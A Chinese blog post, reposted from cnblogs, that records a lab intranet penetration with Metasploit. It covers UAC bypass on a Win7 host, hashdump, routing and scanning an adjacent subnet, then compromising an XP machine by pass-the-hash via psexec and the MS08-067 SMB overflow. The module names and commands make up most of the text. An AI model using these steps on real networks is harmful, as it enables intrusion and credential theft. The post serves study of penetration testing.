内网渗透bypassuac和smb溢出

对内网渗透需要渗透的目标主机处于跨网段和uac限制的情况做一个渗透记录

 

环境大致如下 拥有shell权限的win7(uac限制,处于双网段) 和同win7同一网段下暂时无权限的靶机xp

 

先对有权限的win7进行hashdump

 

 

显示失败 getsystem一下

 

 还是失败 msf的模块绕过uac

use exploit/windows/local/bypassuac

 

set session 1(session1 为我们的win7权限)

 

此时再进入meterpreter  hashdumpgetsystem

 

可以看到绕过了uac  获得了权限

 

导出了hash 接下来对和win7同网段的xp进行扫描探测

 

得到本地子网网段

run get_local_subnets

 

处于192.168.100.0 子网掩码为255.255.255.0这个网段

run autoroute  -s 网段  添加路由  -p 查看已经添加的路由

 

添加完成后  开始扫描

扫描存活ip

run post/windows/gather/arp_scanner RHOST=网段

 

发现内网以下存在这些主机 其中192.168.100.5 是目标xp

 

 确定了目标 接下来扫描端口

 

扫描端口

run axiliary/scanner/portscan/tcp

 

 

 

探测完信息后

 

可以通过之前抓的hash值 进行hash传递攻击

 

使用msf 下的exploit/windows/smb/psexec

 

 

 

也可以通过对应服务溢出漏洞 渗透拿到目标xp的权限

 

 

 

 

 开放了smb 使用了ms08_067 溢出成功

 

转载于:https://www.cnblogs.com/-qing-/p/10128930.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值